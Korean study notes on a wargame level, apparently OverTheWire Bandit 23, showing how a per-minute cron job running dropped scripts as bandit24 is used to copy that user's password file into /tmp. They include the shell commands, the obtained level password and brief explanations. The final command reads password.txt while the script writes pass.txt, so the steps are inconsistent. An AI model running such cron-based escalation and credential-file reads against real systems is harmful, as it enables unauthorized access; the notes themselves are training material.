-
목표
/var/spool/bandit24/foo폴더에 1분마다 실행되는 크론잡의 특성을 이용해 bandit24 권한으로 내 스크립트 실행시키기. -
실행 명령어
mkdir /tmp/work123_pwn
chmod 777 /tmp/work123_pwn
cd /tmp/work123_pwn
echo '#!/bin/bash' > solve.sh
echo 'cat /etc/bandit_pass/bandit24 > /tmp/work123_pwn/pass.txt' >> solve.sh
chmod 777 solve.sh
cp solve.sh /var/spool/bandit24/foo/
cat /tmp/work123_pwn/password.txt- 핵심 정보
- ID: bandit23
- 획득 PW: gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8
- 메모
chmod 777: 스크립트가 들어있는 폴더와 스크립트 자체에 모든 사용자 읽기/쓰기/실행(777) 권한.- 쉘 스크립트
#!/bin/bash: 리눅스 명령어가 담긴 실행 파일이라고 알려주는 코드. /var/spool내의 파일은 실행 직후 시스템에 의해 삭제되므로, 결과물은 반드시 /tmp 폴더에 저장되도록 경로를 지정해야 함.
